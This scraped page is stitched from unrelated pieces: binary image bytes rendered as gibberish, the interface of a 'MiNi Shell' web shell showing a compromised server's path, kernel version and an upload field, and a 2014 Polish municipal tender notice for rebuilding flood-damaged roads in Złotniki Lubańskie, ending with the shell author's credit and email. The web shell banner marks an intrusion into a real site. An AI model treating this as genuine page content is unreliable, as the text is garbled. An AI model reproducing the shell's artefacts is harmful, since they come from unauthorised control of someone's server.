JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140312/83018-N-2014.html

<p class="kh_header"><b>Leśna: Odbudowa drogi gminnej w Złotnikach Lubańskich do posesji mieszkalnych (dz. nr 201, 202, 203, 206, 208, 81/4; km 0+000-0+700, 0+000-0+096, 0+000-0+121, 0+000-0+108, 0+000-0+106) oraz do ośrodka (dz. nr 204, km 0+000-0+150) wraz z przepustem [powódź lipiec 2013]</b><br>
<b>Numer ogłoszenia: 83018 - 2014; data zamieszczenia: 12.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leśna , Rynek 19, 59-820 Leśna, woj. dolnośląskie, tel. 075 7211239, faks 075 7242368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lesna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa drogi gminnej w Złotnikach Lubańskich do posesji mieszkalnych (dz. nr 201, 202, 203, 206, 208, 81/4; km 0+000-0+700, 0+000-0+096, 0+000-0+121, 0+000-0+108, 0+000-0+106) oraz do ośrodka (dz. nr 204, km 0+000-0+150) wraz z przepustem [powódź lipiec 2013].</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem inwestycji jest remont dróg gminnych, położonych w obrębie ewidencyjnym Złotniki Lubańskie.
Inwestycja obejmuje drogi o łącznej długości 1281 mb, oznaczone w projekcie jako :
a) droga główna o długości 700 mb - zlokalizowana na działce nr 201,
b) łącznik 1 o długości 96 mb - zlokalizowana na działce nr 206,
c) łącznik 2 o długości 121 mb - zlokalizowana na działce nr 203 i części działki 81/4,
d) łącznik 3 o długości 108 mb - zlokalizowana na działce nr 202 i części działki 81/4,
e) łącznik 4 o długości 106 mb - zlokalizowana na działce nr 208.
f) droga do ośrodka o długości 140,23 m wraz z odbudową przepustu - zlokalizowana na działce nr 204

dla odcinków wskazanych w pkt od a) do e) remont dróg polegać będzie na:
- wykonaniu koryta drogi o średniej głębokości 30 cm,
- wykonaniu warstwy odsączającej z piasku i podbudowy dwuwarstwowej z tłucznia kamiennego,
-  wykonaniu dwuwarstwowej nawierzchni bitumicznej,
-  ścięciu zawyżonych poboczy o średniej szerokości po 50 cm i ich wzmocnieniu niesortem kamiennym,
- wykonaniu zjazdów drogowych, wejść do posesji i miejsc postojowych,
- odbudowie i przebudowie istniejących i budowie nowych elementów odwodnienia podłużnego i poprzecznego drogi (rów odpływowy, przepust drogowy, kanalizacja deszczowa, ścieki drogowe, obramowania z krawężników i obrzeży betonowych),
-  wykonaniu oznakowania pionowego skrzyżowań z drogą powiatową.

Zestawienie powierzchni poszczególnych części zagospodarowania terenu.
Powierzchnia zabudowy projektowanych elementów:
- powierzchnia podbudowy tłuczniowej - 3.805,25 m2
- powierzchnia nawierzchni asfaltowej - 3.635,55 m2
- zjazdy drogowe, wejścia i miejsca postojowe - 934,0 m2
- powierzchnia poboczy - 697 m2
- ścieki drogowe - 176,4 m2
- krawężniki i obrzeża - 148,08 m2

dla odcinka wskazanego w pkt f) remont dróg polegać będzie na:

Roboty rozbiórkowe.
Rozbiórka obejmuje wyrównanie i oczyszczenie istn. nawierzchni na odc. ok. 60 m, demontaż odzyskowy płyt JUMBO ok.48 szt wraz z podbudową, na pozostałym odcinku wymianę 30 cm warstwy gruntu na całej szerokości drogi, oraz istniejący przepust., ścinanie poboczy, karczowanie krzewów.
Pozyskany gruz i inne frakcje należy posortować i odtransportować do centrum utylizacji.
Należy zachować szczególną ostrożność aby nie zanieczyścić terenów sąsiednich odpadami
porozbiórkowymi.

Roboty ziemne.
Roboty ziemne należy wykonywać pod nadzorem z należytą ostrożnością. O jakichkolwiek urządzeniach obcych nie zinwentaryzowanych na mapie należy powiadomić Inspektora nadzoru.
Roboty ziemne obejmują m.in. usuniecie nadmiarów gruntu (grunt kat. I-III) na skarpach i uzupełnienie nasypów wraz z profilowaniem wymianę 30 cm warstwy gruntu na całej szerokości drogi na dł. ok 70 m .

Roboty Żelbetowe.
Obejmują wykonanie ław fundamentowych pod mury ścian czołowych przepustów. Ławy o wymiarze stałym na długości 40 x 60, zbroić- min. 4 x fi 10, strzemiona fi 8, co 15 cm, Beton B30,
stal 18G2.

Umocnienie skarpy i dna rowu.
Umocnienia skarp i den rowów wykonać w bezpośrednim sąsiedztwie wlotów i wylotów istniejących, odbudowywanych i przebudowywanych przepustów na odcinkach ok. 2,0 m. Na oczyszczonych i wyprofilowanych skarpach i dnie rowy wykonać obrzut kamienny z kamienia łamanego lub otoczaków o min wymiarze 10 x 10 x 10 cm na betonie B15 z pełnym fugowaniem i spoinowaniem. Grubości umocnień - 20 cm na dnach i 12 cm na pozostałych odcinkach.

Ścianki czołowe przepustów.
Tradycyjnie murowane z ciosów kamiennych ( granit lub bazalt ) o wym. min 20 x 20 x 20 o zmiennej szerokości min. 30 cm, ma zaprawie cementowej M20. Wysokość murów dobrać tak aby wznosiły się nad poziom drogi min. 12 cm. Nad rurą przepustu wyprofilować sklepienie łukowe.

Konstrukcja jezdni i poboczy.
Konstrukcję przewidziano typową jak dla KR1, typ A:
warstwa ścieralną z betonu asfaltowego 0,075/6,3 mm gr. 4 cm,
warstwa wiążąca z betonu asfaltowego 0/12,8mm gr. 4 cm,
podbudowa z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm,
podłoże niewysadzinowe wzmocnione do min. G2 gr. min. 4 cm.
Spadki poprzeczne - jednokierunkowe 2%. Rzędną niwelety i szczegóły oraz zakresy realizacyjne
należy uzgodnić z projektantem przebudowywanej drogi.
Pobocza należy wyprofilować i wzmocnić kruszywem łamanym na szerokości min. 50 cm .

Zjazdy.
Na zjazdach konstrukcja z płyt JUMBO ( z odzysku ) na podsypce piask-cem (1:4), po uprzednim
wykorytowaniu warstwy gr. 20 cm. W tej samej technologii zabezpieczyć konstrukcję nowej
nawierzchni na końcu projektowanej drogi.

Odwodnienie.
Na całej długości drogi poprzez spadek poprzeczny (2%) jednostronny, z przełamaniem kierunku.
Na całej długości jednostronnie osadzić ściek prefabrykowany 60x50x15 na betonie B15, którego
zakończenie przewidziano przy projektowanym przepuście.

Przepusty.
Przewidziano przebudowę jednego przepustu drogowego - z rury PEHD, SN8, fi 500 dł. 6,0 m
Przebudowa obejmuje m.in. wykonanie nowych ścianek czołowych. Posadowienie i obsypkę
wykonać zgodnie z wymogami dostawców ww. przepustów.

Uwaga nr 1: Na prowadzenie robót budowlanych na obszarze historycznego układu urbanistycznego (odcinki dróg a-e) uzyskano pozwolenie od Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu.

Uwaga nr 2: Ponieważ, w niektórych miejscach, granice pasa drogowego dróg objętych opracowaniem mogły zostać naruszone, Wykonawca zobowiązany jest przed rozpoczęciem realizacji zadania dokonać wznowienia granic pasa drogowego przez uprawnionego geodetę, dla umożliwienia uniknięcia kolizji z ustaleniami ewidencji gruntów.

Szczegółowy opis przedmiotu zamówienia stanowią załączniki 

Załącznik nr 1 do SIWZ	Specyfikacja techniczna wykonania i odbioru robót
Załącznik nr 2 do SIWZ	Dokumentacja projektowa
Załącznik nr 3 do SIWZ	Przedmiar robót.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości 15.000,00 złotych (słownie: piętnaście tysięcy złotych )</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się Wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem przedmiotowi zamówienia tj. wykonanie prac polegających na budowie, odbudowie, przebudowie, remoncie drogi o nawierzchni mineralno-bitumicznej o wartości nie mniejszej niż 600.000,00 zł brutto (sześćset tysięcy złotych brutto), oraz załączenie dokumentu potwierdzającego, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">oświadczenie o treści załacznika nr 5 do siwz</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy
2) kosztorys ofertowy sporządzony metodą uproszczoną w celach informacyjnych;
2) dowód wniesienia wadium
3) Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5 ustawy Prawo zamówień publicznych, w przypadku przynależności do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa , której wzór stanowi  Załącznik Nr 9 do SIWZ.
Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą  powodować konieczność  wprowadzenia zmian                 w treści zawartej umowy w stosunku do treści złożonej oferty:
1. Zamawiający przewiduje zmianę postanowień umowy w przypadku:
1.1.  ustawowej zmiany wysokości podatku VAT, 
1.2. konieczności zmiany zakresu prac, wynikająca z wprowadzenia w dokumentacjach projektowych istotnych lub nieistotnych zmian w rozumieniu ustawy Prawo budowlane, 
1.3. konieczności wykonania prac wynikających ze zleceń organów administracji architektoniczno-budowlanej, np. nadzoru budowlanego, wydanych stosownie do ich właściwości, 
1.4. konieczności wykonania robót zamiennych, nie wykraczających poza zakres przedmiotu zamówienia, których wprowadzenie będzie konieczne dla wykonania całości robót 
i uzyskania założonego efektu użytkowego, 
1.5. istotnych braków lub błędów w dokumentacji projektowej, również tych polegających         na niezgodności dokumentacji z przepisami prawa, 
1.6. zaistnienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne                dla Zamawiającego, 
1.7. zmiany danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby Wykonawcy, 
2. konieczności przedłużenia terminu umowy z powodu: 
a) działania Siły Wyższej, tj. wyjątkowego zdarzenia lub okoliczności; które uniemożliwiają wykonanie robót budowlanych,
b)  z przyczyn zależnych od Zamawiającego,
c) wystąpienia takich czynników atmosferycznych w czasie realizacji robót, które uniemożliwiają prawidłową realizację przedmiotu umowy. 
d) działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron. 
e) z przyczyn niezależnych od Wykonawcy.
Zmiany umowy wymagają formy pisemnej - aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:bip.umlesna.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Leśnej, ul. Świerczewskiego 11B, I piętro pok. nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2014 godzina 09:30, miejsce: Urząd Miejski w Leśnej, ul.Rynek 19, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie dofinansowane jest ze środków budżetu państwa przeznaczonych na usuwanie skutków klęsk żywiołowych - powódź lipiec 2013r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com